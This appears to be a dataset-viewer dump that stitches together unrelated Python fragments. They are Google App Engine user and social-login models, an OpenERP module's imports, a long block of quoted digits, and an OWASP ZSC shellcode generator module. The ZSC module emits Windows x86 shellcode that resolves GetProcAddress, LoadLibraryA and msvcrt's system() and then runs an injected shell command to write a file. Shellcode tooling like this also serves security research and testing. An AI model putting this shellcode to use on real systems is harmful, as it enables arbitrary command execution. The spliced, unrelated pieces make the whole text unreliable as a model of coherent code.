sender = ndb.StringProperty(
required=True)
to = ndb.StringProperty(
required=True)
subject = ndb.StringProperty(
required=True)
body = ndb.TextProperty()
when = ndb.DateTimeProperty()
class SocialUser(ndb.Model):
PROVIDERS_INFO = { # uri is for OpenID only (not OAuth)
'google': {'name': 'google', 'label': 'Google', 'uri': 'gmail.com'},
#'github': {'name': 'github', 'label': 'Github', 'uri': ''},
#'facebook': {'name': 'facebook', 'label': 'Facebook', 'uri': ''},
#'linkedin': {'name': 'linkedin', 'label': 'LinkedIn', 'uri': ''},
#'myopenid': {'name': 'myopenid', 'label': 'MyOpenid', 'uri': 'myopenid.com'},
#'twitter': {'name': 'twitter', 'label': 'Twitter', 'uri': ''},
#'yahoo': {'name': 'yahoo', 'label': 'Yahoo!', 'uri': 'yahoo.com'},
}
user = ndb.KeyProperty(kind=User)
provider = ndb.StringProperty()
uid = ndb.StringProperty()
extra_data = ndb.JsonProperty()
@classmethod
def get_by_user(cls, user):
return cls.query(cls.user == user).fetch()
@classmethod
def get_by_user_and_provider(cls, user, provider):
return cls.query(cls.user == user, cls.provider == provider).get()
@classmethod
def get_by_provider_and_uid(cls, provider, uid):
return cls.query(cls.provider == provider, cls.uid == uid).get()
@classmethod
def check_unique_uid(cls, provider, uid):
# pair (provider, uid) should be unique
test_unique_provider = cls.get_by_provider_and_uid(provider, uid)
if test_unique_provider is not None:
return False
else:
return True
@classmethod
def check_unique_user(cls, provider, user):
# pair (user, provider) should be unique
test_unique_user = cls.get_by_user_and_provider(user, provider)
if test_unique_user is not None:
return False
else:
return True
@classmethod
def check_unique(cls, user, provider, uid):
# pair (provider, uid) should be unique and pair (user, provider) should be unique
return cls.check_unique_uid(provider, uid) and cls.check_unique_user(provider, user)
@staticmethod
def open_id_providers():
return [k for k,v in SocialUser.PROVIDERS_INFO.items() if v['uri']]
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLE | ARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or | FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_move_line
import account_move_reconcile
import cash_flow_type
import cash_flow_distribution
import report
import wizard |
1033915679"\
"83989576556519317788300024161353956243777784080174881937309502"\
"69990089089932808839743036773659552489130015663329407790713961"\
"46453408879151030065132193448667324827590794680787981942501958"\
"62232039513125201410996053126069655540424867054998678692302174"\
"98900954785072567297879476988883109348746442640071818316033165"\
"51153427615562240547447337804924621495213325852769884733626918"\
"64917433898782478927846891882805466998230368993978341374758702"\
"80571634941356843392939606819206177333179173820856243643363535"\
"86349449689078106401967407443658366707158692452118299789380407"\
"13750129085864657890577142683358276897855471768718442772612050"\
"26648610205153564284063236848180728794071712796682006072755955"\
"90404023317874944734645476062818954151213916291844429765106694"\
"96935401686601005519607768733539651161493093757096855455938151"\
"78956903925101495326562814701199832699220006639287537471313523"\
"42158926512620407288771657835840521964605410543544364216656224"\
"56504299901025658692727914275293117208279393775132610605288123"\
"37345106837293989358087124386938593438917571337630072031976081"\
"60446468393772580690923729752348670291691042636926209019960520"\
"12102407764819031601408586355842760953708655816427399534934654"\
"31450404019952853725200495780525465625115410925243799132626271"\
"60909940290226206283675213230506518393405745011209934146491843"\
"32364656937172591448932415900624202061288573292613359680872650"\
"04562828455757459659212053034131011182750130696150983551563200"\
"31078460190656549380654252522916199181995960275232770224985573"\
"82489988270746593635576858256051806896428537685077201222034792"\
"99393617926820659014216561592530673794456894907085326356819683"\
"86177226824991147261573203580764629811624401331673789278868922"\
"03259334986179702199498192573961767307583441709855922217017182"\
"71277753449150820527843090461946083521740200583867284970941102"\
"26695392144546106621500641067474020700918991195137646690448126"\
"25369153716229079138540393756007783515337416774794210038400230"\
"95185099454877903934612222086506016050035177626483161115332558"\
"70507354127924990985937347378708119425305512143697974991495186"\
"53592040383023571635272763087469321962219006426088618367610334"\
"00225547747781364101269190656968649501268837629690723396127628"\
"22304114181361006026404403003599698891994582739762411461374480"\
"05969706257676472376606554161857469052722923822827518679915698"\
"39074767114610302277660602006124687647772881909679161335401988"\
"40275799217416767879923160396356949285151363364721954061117176"\
"38737255572852294005436178517650230754469386930787349911035218"\
"53292972604455321079788771144989887091151123725060423875373484"\
"25708606406905205845212275453384800820530245045651766951857691"\
"20004281675805492481178051983264603244579282973012910531838563"\
"82120621553128866856495651261389226136706409395333457052698695"\
"69235035309422454386527867767302754040270224638448355323991475"\
"36344104405009233036127149608135549053153902100229959575658370"\
"38126196568314428605795669662215472169562087001372776853696084"\
"70483332513279311223250714863020695124539500373572334680709465"\
"48308920980153487870563349109236605755405086411152144148143463"\
"43727327104502776866195310785832333485784029716092521532609255"\
"93265560067212435946425506599677177038844539618163287961446081"\
"78927217183690888012677820743010642252463480745430047649288555"\
"40906218515365435547412547615276977266776977277705831580141218"\
"68801170502836527554321480348800444297999806215790456416195721"\
"78450892848980642649742709057912906921780729876947797511244730"\
"99140605062994689428093103421641662993561482813099887074529271"\
"04843363081840412646963792584309418544221635908457614607855856"\
"47381493142707826621518554160387020687698046174740080832434366"\
"38235455510944949843109349475994467267366535251766270677219418"\
"19197719637801570216993367508376005716345464367177672338758864"\
"40564487156696432104128259564534984138841289042068204700761559"\
"91684303899934836679354254921032811336318472259230555438305820"\
"94167562999201337317548912203723034907268106853445403599356182"\
"57631283776764063101312533521214199461186935083317658785204711"\
"36433122676512996417132521751355326186768194233879036546890800"\
"82713528358488844411176123410117991870923650718485785622102110"\
"00977699445312179502247957806950653296594038398736990724079767"\
"04082679400761872954783596349279390457697366164340535979221928"\
"87057495748169669406233427261973351813662606373598257555249650"\
"80726012366828360592834185584802695841377255897088378994291054"\
"80033111388460340193916612218669605849157148573356828614950001"\
"09759112521880039641976216355937574371801148055944229873041819"\
"80808564726571354761283162920044988031540210553059707666636274"\
"32830891688093235929008178741198573831719261672883491840242972"\
"29043496552694272640255964146352591434840067586769035038232057"\
"93413298159353304444649682944136732344215838076169483121933311"\
"81906109614295220153617029857510559432646146850545268497576480"\
"80800922133581137819774927176854507553832876887447459159373116"\
"47060109124460982942484128752022446259447763874949199784044682"\
"25736096853454984326653686284448936570411181779380644161653122"\
"60021491876876946739840751717630751684985635920148689294310594"\
"20245796962292456664488196757629434953532638217161339575779076"\
"37076456957025973880043841580589433613710655185998760075492418"\
"21171488929522173772114608115434498266547987258005667472405112"\
"00738345927157572771521858994694811794064446639943237004429114"\
"74721818022482583773601734668530074498556471542003612359339731"\
"91445859152288740871950870863221883728826282288463184371726190"\
"30577714765156414382230679184738603914768310814135827575585364"\
"59772165002827780371342286968878734979509603110889919614338666"\
"06845069742078770028050936720338723262963785603865321643234881"\
"55755701846908907464787912243637555666867806761054495501726079"\
| "14293083128576125448194444947324481909379536900820638463167822"\
"06480953181040657025432760438570350592281891987806586541218429"\
"21727372095510324225107971807783304260908679427342895573555925"\
"72380551144043800123904168771644518022649168164192740110645162"\
"431101700056691121733189423400 | 54795968466980429801736257040673"\
"28212996215368488140410219446342464622074557564396045298531307"\
"40908460849965376780379320189914086581466217531933766597011433"\
"60862500982956691763884605676297293146491149370462446935198403"\
"53444913514119366793330193661766365255514917498230798707228086"\
"85962611266050428929696653565251668888557211227680277274370891"\
"38963977225756489053340103885593112567999151658902501648696142"\
|
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/inde | x.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
from core i | mport stack
def create_file(create_command):
return '''
xor %ecx,%ecx
mov %fs:0x30(%ecx),%eax
mov 0xc(%eax),%eax
mov 0x14(%eax),%esi
lods %ds:(%esi),%eax
xchg %eax,%esi
lods %ds:(%esi),%eax
mov 0x10(%eax),%ebx
mov 0x3c(%ebx),%edx
add %ebx,%edx
mov 0x78(%edx),%edx
add %ebx,%edx
mov 0x20(%edx),%esi
add %ebx,%esi
xor %ecx,%ecx
inc %ecx
lods %ds:(%esi),%eax
add %ebx,%eax
cmpl $0x50746547,(%eax)
jne 23 <.text+0x23>
cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
xor %esi,%esi
mov %edx,%esi
xor %ecx,%ecx
push %ecx
push $0x41797261
push $0x7262694c
push $0x64616f4c
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
mov $0x6c6c,%cx
push %ecx
push $0x642e7472
push $0x6376736d
push %esp
call *%eax
xor %edi,%edi
mov %eax,%edi
xor %edx,%edx
push %edx
mov $0x6d65,%dx
push %edx
push $0x74737973
mov %esp,%ecx
push %ecx
push %edi
xor %edx,%edx
mov %esi,%edx
call *%edx
xor %ecx,%ecx
{0}
push %esp
call *%eax
xor %edx,%edx
push %edx
push $0x74697865
mov %esp,%ecx
push %ecx
push %edi
call *%esi
xor %ecx,%ecx
push %ecx
call *%eax
'''.format(create_command)
def run(data):
file_to_create = data[0]
file_content = data[1]
return create_file(stack.generate("echo " + file_content + ">" +
file_to_create, "%ecx", "string"))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.